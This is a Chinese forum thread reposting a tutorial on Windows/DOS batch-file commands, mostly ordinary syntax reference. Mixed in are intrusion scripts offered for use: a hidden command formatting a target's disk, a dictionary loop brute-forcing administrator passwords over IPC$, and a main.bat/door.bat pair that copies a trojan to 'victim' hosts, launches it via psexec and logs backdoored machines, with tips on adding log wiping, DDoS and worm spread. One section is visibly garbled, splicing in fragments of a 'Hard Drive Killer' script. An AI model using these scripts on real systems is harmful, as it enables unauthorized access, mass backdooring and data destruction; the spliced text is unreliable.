[转]批处理内部命令简介与详细说明

leaparde

youxi01大侠发过一次，不过全是htm代码，小弟处理一下发上来，希望没冒犯到高手。

一.简单批处理内部命令简介

1.Echo 命令
　　打开回显或关闭请求回显功能，或显示消息。如果没有任何参数，echo 命令将 显示当前回显设置。
　　语法
　　echo [{on　off}] [message]
　　Sample：

@echo off / echo hello world 
复制代码

　　在实际应用中我们会把这条命令和重定向符号（也称为管道符号，一般用> >> ^）结合来实现输入一些命令到特定格 式的文件中.这将在以后的例子中体现出来。

2.@ 命令
　　表示不显示@后面的命令，在入侵过程中（例如使用批处理来格式化敌人的硬盘）自然不能让对方看到你使用的命令啦。
　　Sample：
     

       @echo off 
　　@echo Now initializing the program,please wait a minite... 
　　@format X: /q/u/autoset
       
复制代码

       (format 这个命令是不可以使用/y这个参数的，可喜的是微软留了个autoset这个参数给我们，效果和/y是一样的。)


　　3.Goto 命令
　　指定跳转到标签，找到标签后，程序将处理从下一行开始的命令。
　　语法：goto label （label是参数，指定所要转向的批处理程序中的行。）
　　Sample：

 
　　if {%1}=={} goto noparms 
　　if {%2}=={} goto noparms（如果这里的if、%1、%2你不明白的话，先跳过去，后面会有详细的解释。） 
　　@Rem check parameters if null show usage 
　　:noparms 
　　 echo Usage: monitor.bat ServerIP PortNumber 
　　goto end
复制代码

　　标签的名字可以随便起，但是 最好是有意义的字母啦，字母前加个：用来表示这个字母是标签，goto命令就是根据这个：来寻找下一 步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。

　　4.Rem 命令
　 　注释命令，在C语言中相当与/*--------*/,它并不会被执行，只是起一个注释的作用，便于别人阅读 和你自己日后修改。
　　Rem Message
　　Sample：

@Rem Here is the description. 
复制代码

　　 5.Pause 命令
　　运行 Pause 命令时，将显示下面的消息：
　　Press any key to continue . . .
　　Sample：

　　@echo off 
　　:begin 
　　copy a:*.* d：\back 
　　echo Please put a new disk into driver A 
　　pause 
　　goto begin
复制代码

　　在这个例子中，驱动 器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时， pause 命令会使程序挂起，以便您更换磁盘，然后按任意键继续处理。

　　6.Call 命令
　　 从一个批处理程序调用另一个批处理程序，并且不终止父批处理程序。call 命令接受用作调用目标的标 签。如果在脚本或批处理文件外使用 Call，它将不会在命令行起作用。
　　语法
　　call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
　　参数
　　[Drive:} [Path] FileName
　　指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。

　7.start 命令
　　调用外部程序，所有的DOS命令和命令行程序都可以由start命 令来调用。
　　入侵常用参数：
　　MIN 开始时窗口最小化
　　SEPARATE 在分开的空间内开 始 16 位 Windows 程序
　　HIGH 在 HIGH 优先级类别开始应用程序
　　REALTIME 在 REALTIME 优先级类别开始应用程序WAIT 启动应用程序并等候它结束
parameters 这些为传送到命令/程 序的参数
　　执行的应用程序是 32-位 GUI 应用程序时，CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行，该新行为则不会发生。

　8.choice 命令
　　choice 使用此命令 可以让用户输入一个字符，从而运行不同的命令。使用时应该加/ c:参数，c:后应写提示可输入的字符， 之间无空格。它的返回码为1234……
　　如: choice /c:dme defrag,mem,end
　　将显示
　 　defrag,mem,end[D,M,E]?
　　Sample：
　　Sample.bat的内容如下:
　　

       @echo off 
　    choice /c:dme defrag,mem,end 
　　if errorlevel 3 goto defrag 
       ::应先判断数值最高的错误码
　　if errorlevel 2 goto mem 
　　if errotlevel 1 goto end 
　　:defrag 
　　 c:\dos\defrag 
　　goto end 
　　:mem 
　　mem 
　　goto end 
　　:end 
　　echo good bye 
       
复制代码

　此文件运行后，将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ，然后if语句将作出判断，d表示执行标号为defrag的程序段，m表示执行标号为mem的程序段，e表示执行标号为end的 程序段，每个程序段最后都以goto end将程序跳到end标号处，然后程序将显示good bye，文件结束。

　　9.If 命令
　　if 表示将判断是否符合规定的条件，从而决定执行不同的命令。 有三种格式:
　　1、if "参数" == "字符串" 　待执行的命令
　　参数如果等于指定的字符串，则条件成立，运 行命令，否则运行下一句。(注意是两个
等号）
　　如if "%1"=="a" format a:
　　if {%1} =={} goto noparms
　　if {%2}=={} goto noparms

　　2、if exist 文件名　 待执行的命令
　　如果有指定的文件，则条件成立，运行命令，否则运行下一句。
　如if exist config.sys edit config.sys

　　3、if errorlevel / if not errorlevel 数字　 待执行的命令
　　如果返 回码等于指定的数字，则条件成立，运行命令，否则运行下一句。
　　如if errorlevel 2 goto x2 　
　　DOS程序运行时都会返回一个数字给DOS，称为错误码errorlevel或称返回码，常见的
返回码为0 、1。

[ 本帖最后由 leaparde 于 2008-12-30 21:32 编辑 ]

leaparde

10.for 命令
　　for 命令是一个比较复杂的命令，主要用于参数在指定的范围内循环执行命令。在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable
　　for {%variable　% %variable} in (set) do command [ CommandLineOptions]
　　%variable 指定一个单一字母可替换的 参数。
　　(set) 指定一个或一组文件。可以使用通配符。
　　command 指定对每个文件执行的命 令。
　　command-parameters 为特定命令指定参数或命令行开关。
　　在批处理文件中使用 FOR 命令时，指定变量请使用 %%variable，而不要用 %variable。变量名称是区分大小写的，所以%i不同于%I如果命令扩展名被启用，下列额外的FOR命令格式会受到支持:

　　FOR /D %variable IN (set) DO command [command-parameters]
　如果集中包含通配符，则指定与目录名匹配 ，而不与文件名匹配。

　　FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters]
　　检查以 [drive:]path 为根的目录树，指向每个目录中的FOR 语句。如果在 /R 后没有指定目录，则使用当前目录。如果集仅为一个单点(.)字符，则枚举该目录树。

　　FOR /L %variable IN (start,step,end) DO command [command-parameters]
　　该集表示以增量形式从开始到结束的一个数字序列。因此，(1,1,5) 将产生序列 1 2 3 4 5，(5,-1,1) 将产生序列 (5 4 3 2 1)。

　   FOR /F ["options"] %variable IN (file-set) DO command
　　FOR /F ["options"] %variable IN ("string") DO command
　　FOR /F ["options"] %variable IN (command) DO command
　　或者 ，如果有 usebackq 选项:
　　FOR /F ["options"] %variable IN (file-set) DO command
　　FOR /F ["options"] %variable IN ("string") DO command
　　FOR /F ["options"] %variable IN (command) DO command
　　filenameset 为一个或多个文件名。继续到 filenameset 中的下 一个文件之前，每份文件都已被打开、读取并经过处理。处理包括读取文件，将其分成一行行的文 字，然后将每行解析成零或更多的符号。然后用已找到的符号字符串变量值调用 For 循 环。以默认方式，/F 通过每个文件的每一行中分开的第一个空白符号。跳过空白行。您可通过指定可选 "options"
　参数替代默认解析操作。这个带引号的字符串包括一个或多个指定不同解析 选项的关键字。这些关键字为:
　　eol=c - 指一个行注释字符的结尾(就一个)
　　skip=n - 指在 文件开始时忽略的行数。
　　delims=xxx - 指分隔符集。这个替换了空格和跳格键的默认分 隔符集。
　　tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代的 for 本身。这会导 致额外变量名称的格式为一个范围。通过 nth 符号指定 m符号字符串中的最后一个字符星号，　　那么额外的变量将在最后一个符号解析之分配并接受行的保留文本。
　 usebackq - 指定新语法已在下类情况中使用:
　在作为命令执行一个后引号的字符串并且引号字符为文 字字符串命令并允许在 fi中使用双引号扩起文件名称。
sample1:
　　

FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command 
复制代码

　　会分析 myfile.txt 中的每一行，忽略 以分号打头的那些行，将每行中的第二个和第三个符号传递给 for 程序体；用逗号和/或空格定界符号 。请注意，这个 for 程序体的语句引用 %i 来取得第二个符号，引用 %j 来取得第三个符号，引用 %k 来取得第三个符号后的所有剩余符号。对于带有空格的文件名，您需要用双引号将文件名括起来。为了 用这种方式来使用双引号，您还需要使用 usebackq 选项，否则，双引号会被理解成是用作定义某 个要分析的字符串的。
　　%i 专门在 for 语句中得到说明，%j 和 %k 是通过
　　tokens= 选项 专门得到说明的。您可以通过 tokens= 一行指定最多 26 个符号，只要不试图说明一个高于字母 z 或Z 的变量。请记住，FOR 变量是单一字母、分大小写和全局的同时不能有 52 个以上都在使用中。
　 　您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是，用单引号将括号之间的 filenameset 括起来。这样，该字符串会被当作一个文件中的一个单一输入行。
　　最后，您可以用 FOR /F 命令来分析 命令的输出。方法是，将括号之间的 filenameset 变成一个反括字符串。该字符串会被当作命令行，传 递到一个子 CMD.EXE，其输出会被抓进内存，并被当作文件分析。因此，以下例子:
　　

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 
复制代码

　　会枚举当前环境中的环境变量名称。
　　 另外，FOR 变量参照的替换已被增强。您现在可以使用下列选项语法:
　　~I - 删除任何引号 (")，扩充 %I
　　%~fI - 将 %I 扩充到一个完全合格的路径名
　　%~dI - 仅将 %I 扩充到一个驱 动器号
　　%~pI - 仅将 %I 扩充到一个路径
　　%~nI - 仅将 %I 扩充到一个文件名
　　% ~xI - 仅将 %I 扩充到一个文件扩展名
　　%~sI - 扩充的路径只含有短名
　　%~aI - 将 %I 扩充 到文件的文件属性
　　%~tI - 将 %I 扩充到文件的日期/时间
　　%~zI - 将 %I 扩充到文件的大 小
　　%~$PATH:I - 查找列在路径环境变量的目录，并将 %I 扩充到找到的第一个完全合格的名称 。如果环境变量未被定义，或者没有找到文件，此组合键会扩充空字符串可以组合修饰符来得到多 重结果:
　　%~dpI - 仅将 %I 扩充到一个驱动器号和路径
　　%~nxI - 仅将 %I 扩充到一个文件 名和扩展名
　　%~fsI - 仅将 %I 扩充到一个带有短名的完整路径名
　　%~dp$PATH:i - 查找列在 路径环境变量的目录，并将 %I 扩充到找到的第一个驱动器号和路径。
　　%~ftzaI - 将 %I 扩充 到类似输出线路的 DIR
　　在以上例子中，%I 和 PATH 可用其他有效数值代替。%~ 语法用一个有 效的 FOR 变量名终止。选取类似 %I 的大写变量名比较易读，而且避免与不分大小写的组合键混淆。

以上是MS的官方帮助，下面我们举几个例子来具体说明一下For命令在入侵中的用途。
　　sample2 ：
　　利用For命令来实现对一台目标Win2k主机的暴力密码破解。
　　我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接 ，当成功时记下密码。
　　最主要的命令是一条：for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:" administrator"
　　用i%来表示admin的密码， 在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令－－
　　

 for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"　find ":命令成功完成">>D:\ok.txt
复制代码

这样就ko了。
　　sample3：
　　你有没有过手里有大量肉鸡等着你去种后门＋木马呢？，当数量特别多的时候，原本很开心的 一件事都会变得很郁闷：）。文章开头就谈到使用批处理文件，可以简化日常或重复性任务。那么如何 实现呢？呵呵，看下去你就会明白了。
　　主要命令也只有一条：（在批处理文件中使用 FOR 命令时， 指定变量使用 %%variable）

@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k 
复制代码

　　tokens的用法请参见上面的sample1，在这里它表示 按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。
　　而cultivate.bat无非就是 用net use命令来建立IPC$连接，并copy木马＋后门到victim，然后用返回码（If errorlever =）来筛选成功种植后门的主机，并echo出来，或者echo到指定的文件。
　　delims= 表示vivtim.txt中的 内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列，一般就是 ip password username。
　　代码雏形：

 
　　::------------- cut here then save as a batchfile(I call it main.bat ) -------------------------- 
　　@echo off 
　　@if "%1"=="" goto usage 
　　@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack. 
bat %%i %%j %%k 
　　@goto end 
　　:usage 
　 　@echo run this batch in dos modle.or just double-click it. 
　　:end 
　　::--------------- cut here then save as a batchfile(I call it main.bat ) ------------------------ 
　　::--------------- cut here then save as a batchfile(I call it door.bat) -------------------------- 
　　@net use \\%1\ipc$ %3 /u:"%2" 
　　@if errorlevel 1 goto failed 
　　@echo Trying to establish the IPC$ connection …………OK 
　　@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 U SER %2 PWD %3 >>ko.txt 
　　@psexec \\%1 c:\winnt\system32\windrv32.exe 
　  @psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt &nbs p; &nbs p; &nbs p; &nbs p; &nbs p; &nbs p; &nbs p; 
   :failed 
　　@echo Sorry can not connected to the victim. 
　  ::----------------- cut here then save as a batchfile(I call it door.bat) ------------------------
   
复制代码

　　这只是一个自动种植后门批处理的雏形，两个批处理和后门程序（Windrv32.exe ）,PSexec.exe需放在统一目录下.批处理内容尚可扩展,例如:加入清除日志+DDOS的功能,加入 定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自 行研究.

二.如何在批处理文件中使用参数
　　批处理中可以使用参数，一般从1%到 9%这九个，当 有多个参数时需要用shift来移动，这种情况并不多见，我们就不考虑它了。
　　sample1： fomat.bat
　　

   @echo off 
　　if "%1"=="a" format a: 
　　:format 
　　@format a:/q/u/auotset 
　　@echo please insert another disk to driver A. 
　　@pause 
　　@goto fomat 
　　
复制代码

这个例子用于连续地格式化几张软盘，所以用的时候需在dos窗口输入fomat.bat a，好像有点画蛇添足了～^_^
　　sample2：
　　当我们要建立一个IPC$连接地时候总要输 入一大串命令，弄不好就打错了，所以我们不如把一些固定命令写入一个批处理，把肉鸡地ip password username 当着参数来赋给这个批处理，这样就不用每次都打命令了。
　　

    @echo off 
　　@net use \\1%\ipc$ "2%" /u:"3%" 
   ::注意哦，这里PASSWORD是第二个参数 。 
　　@if errorlevel 1 echo connection failed 
　　
复制代码

怎么样,使用参数还是比较简单的吧？你这 么帅一定学会了^_^.No.3

[ 本帖最后由 leaparde 于 2008-12-30 21:28 编辑 ]

leaparde

　　三.如何使用组合命令(Compound Command)
　　1.&
　　 Usage：第一条命令 & 第二条命令 [& 第三条命令...]
　　用这种方法可以同时执行多条命令 ，而不管命令是否执行成功
　　Sample：
　　C:\>dir z: & dir c:\Ex4rch
　　The system cannot find the path specified.
　　Volume in drive C has no label.
　　Volume Serial Number is 0078-59FB
　　Directory of c:\Ex4rch
　　2002-05-14 23:51
.　　 2002-05-14 23:51
.. 　　2002-05-14 23:51 14 sometips.gif
3.　　
　　Usage：第一条命 令 　　 第二条命令 [　　 第三条命令...]
　　用这种方法可以同时执行多条命令，当碰到执行正确的 命令后将不执行后面的命令，
如果没有出现正确的命令则一直执行完所有命令；
　　Sample：
　　C:\Ex4rch>dir sometips.gif 　　 del sometips.gif
　　Volume in drive C has no label.
　　Volume Serial Number is 0078-59FB
　　Directory of C:\Ex4rch
　　2002-05 -14 23:55 14 sometips.gif
　　1 File(s) 14 bytes
　　0 Dir(s) 768,696,320 bytes free
　　组合命令使用的例子：
　　sample：
　　@copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 US ER %2 PASS %3 >>victim.txt

四、管道命令的使用
　　1.　 命令
　　Usage：第 一条命令 　 第二条命令 [　 第三条命令...]
　　将第一条命令的结果作为第二条命令的参数来使用， 记得在unix中这种方式很常见。
　sample：

　　time /t>>D:\IP.log 
　　netstat -n -p tcp　find ":3389">>D:\IP.log 
　　start Explorer 
复制代码

　　看出来了么？用于终端服务允 许我们为用户自定义起始的程序，来实现让用户运行下
面这个bat，以获得登录用户的IP。
　　 2.>、>>输出重定向命令
　　将一条命令或某个程序输出结果的重定向到特定文件中, > 与 >>的区别在于，>会清
除调原有文件中的内容后写入指定文件，而>>只会追加内容到指 定文件中，而不会改动其
中的内容。
　　sample1：
　　

echo hello world>c:\hello.txt (stupid example?) 
复制代码

　　sample2:
　　时下DLL木马盛行，我们知道system32是个捉迷藏的好地方， 许多木马都削尖了脑袋往那里钻，DLL马也不例外，针对这一点我们可以在安装好系统和必要的应用程序 后，对该目录下的EXE和DLL文件作一个记录：
　　运行CMD--转换目录到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt ,
　　这样所有的EXE和DLL文件的名称都 被分别记录到exeback.txt和dllback.txt中,
　　日后如发现异常但用传统的方法查不出问题时,则要考 虑是不是系统中已经潜入DLL木马了.
　　这时我们用同样的命令将system32下的EXE和DLL文件记录 到另外的exeback1.txt和dllback1.txt中,然后运行:
　　CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比较前后两 次的DLL和EXE文件,并将结果输入到ne?
　　echo.
　　echo Regards,
　　echo.
　　echo Munga Bunga
　   :end
　　rem Hard Drive Killer Pro Version 4.0, enjoy!!!!
　　rem Author: Munga Bunga - from Australia, the land full of retarded Australians (help me get out of here).
　　No.7
常用命令
　　echo、@、call、pause、rem　是批处理文件最常用的 几个命令，我们就从他们开始学起。
echo 表示显示此命令后的字符echo off 表示在此语句后所有运行的命令都不显示命令行本身
@ 与echo off相象，但它是加在其它命令行的最前面，表示运行时不显示命令行本身。
call 调用另一条批处理文件（如果直接调用别的批处理文件 ，执行完那条文件后将无法执行当前文件后续命令）
pause 运行此句会暂停，显示Press any key to continue... 等待 用户按任意键后继续
rem 表示此命令后的字符为解释行，不执行，只是给自己今后查找用的
　　例 ：用edit编辑a.bat文件，输入下列内容后存盘为c:\a.bat，执行该批处理文件后可
实现：将根目录中所 有文件写入 a.txt中，启动UCDOS，进入WPS等功能。

　　::批处理文件的内容为: 　　　　　　　　 文件 表示： 
　　　　echo off　　　　　　　　　　　　 ::不显示命令行 
　　　　dir c:\*.* >a.txt 　　　　　　　        :: 将c盘文件列表写入a.txt 
　　　　call c:\ucdos\ucdos.bat　　　　      ::调用ucdos 
　 　　 echo 你好 　　　　　　　　　　　::显示"你好" 
　　　　pause 　　　　　　　　　　　　　::暂 停,等待按键继续 
　　　　rem 使用wps 　　　　　　　　　　::注释将使用wps 
　　　　cd ucdos　 　　　　　　　　　     ::进入ucdos目录 
　　　　wps 　　　　　　　　　　　　　　::使用wps　　 
复制代码

          批处理文件中还可以像C语言一样使用参数，这只需用到一个参数表示符%。
　　 %表示参数，参数 是指在运行批处理文件时在文件名后加的字符串。变量可以从 %0到%9，%0表示文件名本身，字符串用%1 到%9顺序表示。
　　例如，C：根目录下一批处理文件名为f.bat，内容为 format %1
　　则如果执 行C:\>f a: 　　　则实际执行的是format a:
　　又如C：根目录下一批处理文件的名为t.bat，内容 为 type %1 type %2
　　那么运行C:\>t a.txt b.txt 将顺序地显示a.txt和b.txt文件的内容此外电脑每次启动时都会寻找autoexec.bat这条批处理文件，从而可执行一些每次开机都要执行的命令 ，如设置路径path、加载鼠标驱动mouse、磁盘加速smartdrv，可以使您的电脑真正自动化。

特殊命令
　　if goto choice for　是批处理文件中比较高级的命令，如果这几个你用得很熟练，你就是批处理文件的专家啦。if 表示将判断是否符合规定的条件，从而决定执行不同的命令。 有三种格式:
1、if "参数" == "字符串" 　待执行的命令
参数如果等于指定的字符串，则条件成立，运行命令，否则运行下一句(注意是两个等号)。如if "%1"=="a" format a:
2、if exist 文件名　 待执行的命令
如果有指定的文件，则条件成立，运行命令，否则运行下一句。如if exist config.sys edit config.sys
3、if errorlevel 数字　 待执行的命令
如果返回码等于指定的数字，则条件成立，运行命令，否则运行下一句。如if errorlevel 2 goto x2 　DOS程序运行时都会返回一个数字 给DOS，称为错误码errorlevel或称返回码

goto 批处理文件运行到这里将跳到goto 所指定的标号处，一般与if配合使用。
如:
goto end
:end
echo this is the end
标号用 :字符串表示，标号所在行不被执行

choice 使用此命令可以让用户输入一个字符，从而运行不同的命令。使用时应 该加/c:参数，c:后应写提示可输入的字符，之间无空格。它的返回码为1234……
如: choice /cme defrag,mem,end
将显示
defrag,mem,end[D,M,E]?
例如，test.bat的内容如下:

@echo off 
choice /cme defrag,mem,end 
if errorlevel 3 goto defrag ::应先判断数值最高的错误码 
if errorlevel 2 goto mem 
if errotlevel 1 goto end 
efrag 
c:\dos\defrag 
goto end 
:mem 
mem 
goto end 
:end 
echo good bye 
复制代码

此文件运行后，将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ，然后if语句将作出判断，d表示执行标号为defrag的程序 段，m表示执行标号为mem的程序段，e表示执行标号为end的程序段，每个程序段最后都以goto end将程 序跳到end标号处，然后程序将显示good bye，文件结束。

for 循环命令，只要条件符合，它将多 次执行同一命令。
格式FOR [%%f] in (集合) DO [命令]
只要参数f在指定的集合内，则条件成立， 执行命令
如果一条批处理文件中有一行:
for %%c in (*.bat *.txt) do type %%c 含义是如果是以bat或txt结尾的文件，则显示文件的内容。

autoexec.bat
　　 DOS在启动会自动运行 autoexec.bat这条文件，一般我们在里面装载每次必用的程序，如: path(设置路径)、smartdrv(磁盘加 速)、 mouse(鼠标启动)、mscdex(光驱连接)、 doskey(键盘管理)、set(设置环境变量)等。
　　如果启动盘根目录中没有这个文件，电脑会让用户输入日期和时间。
　　例如，一个典型的 autoexec.bat内容如下:

@echo off　　　　　　　　　　　　　　　　　　::不显示命令行 
prompt $p$g　　　　　　　　　　　　　　　　   ::设置提示符前有目录提示 
path c:\dos;c:\;c:\windows;c:\ucdos;c:\tools　　　 ::设置路径 
lh c:\dos\doskey.com 　　　　　　　　 　　　　 ::加载键盘管理 
lh c:\mouse\mouse.com　　　　　　　　　　　　::加载鼠标管理 
lh c:\dos\smartdrv.exe 　　　　　　　　　　　　 ::加载磁盘加速管理 
lh c:\dos\mscdex /S /D:MSCD000 /M:12 /V　　　　::加载CD-ROM驱动 
set temp=c:\temp 　　　　　　　　　　　　　　 ::设置临时目 
复制代码

IF -EXIST
首先用记事本建立一个文件，文件内容如下：

@echo off 
IF EXIST \AUTOEXEC.BAT TYPE \AUTOEXEC.BAT 
IF NOT EXIST \AUTOEXEC.BAT ECHO \AUTOEXEC.BAT does not exist 
复制代码

在C盘保存文件为TEST.BAT
然后执行命令
C:\>TEST1.BAT
这时，如果 AUTOEXEC.BAT中有内容的话会显示出来。

接着再建立一个文件，内容如下：

@ECHO OFF 
IF EXIST %1 TYPE %1 
IF NOT EXIST %1 ECHO %1 does not exist 
复制代码

也保存在C盘，文件名为TEST2.BAT
然后执行命令
C:\>TEST2 AUTOEXEC.BAT
同样，如果AUTOEXEC.BAT中有内容的话会显示出来 。

说明：
1． IF EXIST 是用来测试文件是否存在的，格式为
IF EXIST [路径+文件名] 命令

2． 其中第二个文件中的%1是参数，DOS允许传递9个批参数信息给批处理文件，分别为%1-------- -%9 ，有点想实参和形参的关系，%1是形参，AUTOEXEC.BAT是实参。
更进一步的，建立一个名为ABC.BAT 的文件，内容如下：

IF ‘%1' = = ‘ A ' ECHO XIAO 
IF ‘%1' = = ‘ B ' ECHO TIAN 
IF ‘ %1' = = ‘ C ' ECHO XIN 
复制代码

完成后运行C:\>ABC.BAT A B C 屏幕上会显示C:\>XIAOTIANXIA
如果执行C:\>ABC.BAT A B 屏幕上会显示C:\>XIAOTIAN
DOS将一个空字符串附给参数%3。可以将NOT放在IF和条件之间，指示IF在条件为假时执行某一命令。
注意：这个命令可在DOS下输入 直接运行。

IF-ERRORLEVEL
用记事本建立一个文件XIAO.BAT，内容如下

@ECHO OFF 
XCOPY C:\AUTOEXEC.BAT D:\ 
IF ERRORLEVEL = = 0 ECHO 成功拷贝文件 
复制代码

然后执行文件
C:\>XIAO.BAT
如果文件拷贝成功，屏幕就会显示：成功拷贝文件
IF ERRORLEVEL 是用来测 试它的上一个DOS命令的返回值的，注意只是上一个命令的返回值，因下面的批处理文件是错误的:

@ECHO OFF 
XCOPY C:\AUTOEXEC.BAT D:\ 
IF ERRORLEVEL = = 0 ECHO 成功拷贝文件 
IF ERRORLEVEL = = 1 ECHO 未找到拷贝文件 
IF ERRORLEVEL = = 2 ECHO 用户通过ctrl-c中止拷贝操作 
IF ERRORLEVEL = = 3 ECHO 预置错误阻止文件拷贝操作 
IF ERRORLEVEL = = 4 ECHO 拷贝过程中写 盘错误 
复制代码

无论拷贝是否成功，后面的：
未找到拷贝文件
用户通过ctrl-c中止拷贝操作
预置错误阻止文件拷贝操作
拷贝过程中写盘错误
都将显示出来。
注意：这个命令是可以在DOS下直 接输入的。
例如：
C:\>XCOPY \AUTOEXEC.BAT D:\
之后可以执行
C:\> IF ERRORLEVEL = = 0 ECHO 成功拷贝文件
如果成功，屏幕将显示： 成功拷贝文件

[ 本帖最后由 leaparde 于 2008-12-30 21:50 编辑 ]

leaparde

以下就是几个 常用命令的返回值：
backup
出口状态 意义
0              备份成功
1              未找到备份文件
2              文件共 享冲突阻止备份完成
3             用户用ctrl-c中止备份
4             由于致命的错误使备份操作中止

diskcomp
出口状态 意义
0             盘比较相同
1             盘比较不同
2             用户通过ctrl-c中止比较操作
3             由于致命的错误使比较操作中止
4             预置错误中止比较

diskcopy
出口状态 意义
0             盘拷贝操作 成功
1             非致命盘读/写错
2             用户通过ctrl-c结束拷贝操作
3             因致命的处理错误使盘拷贝中止
4             预置错误阻止拷贝操作

format
出口状态 意义
0             格式化成功
3             用户通过ctrl-c中 止格式化处理
4             因致命的处理错误使格式化中止
5             在提示“proceed with format（y/n）？”下用 户键入n结束

xopy
出口状态 意义
0             成功拷贝文件
1             未找到拷贝文件
2             用户通过 ctrl-c中止拷贝操作
4             预置错误阻止文件拷贝操作
5             拷贝过程中写盘错误

IF STRING = = STRING
首先用记事本建立一个名为XIAO.BAT的文件，文件内容如下：

@echo off 
IF "%1" = = "A" FORMAT A: 
复制代码

接着执行
C:\>XIAO A
屏幕上就出现是否将A：盘格式化的内容。
这个 语句的格式为
IF "参数" = = "字符串" 　待执行的命令
参数如果等于指定的字符串，则条件成立 ，运行命令，否则运行下一句。
注意：要想在DOS下直接使用，只有这样
C:\> IF "A" = = "A" FORMAT A:
毫无意义。

GOTO
首先用记事本建立一个名为XIAO.BAT的文件，文件内容如下：

@ECHO OFF 
IF EXIST C:\AUTOEXEC.BAT GOTO KB 
: KBCOPY C:\AUTOEXEC.BAT D:\ 
: DONE
复制代码

注意：
1． 标号前是冒号（：）
2． 标号的最后一行是: DONG
3． DOS支持最长为八位的标号，当无法区别两个标号时，将跳转至最近的一个标号。

FOR
首先用记事本 建立一个名为XIAO.BAT的文件，文件内容如下：

@ECHO OFF 
FOR %%C IN (*.BAT *.TXT *.SYS) DO TYPE %%C 
复制代码

接着执行
C:>XIAO.BAT
执行以后，屏幕上会将C:盘所有的以 *.BAT *.TXT *.SYS 为扩展名的文件内容显示出来，
当然不包括隐藏文件。
说明：字符%%C 表示FOR命令变量，FOR支持 通配符

[ 本帖最后由 leaparde 于 2008-12-30 21:55 编辑 ]

BBCC

code一下吗

leaparde

原帖由 BBCC 于 2008-12-30 19:35 发表
code一下吗

谢谢楼上兄弟提醒，已经改了。

sjzong

谢谢楼主，讲得精彩！

c64kkd

辛苦了,谢谢指点！学习学习再学习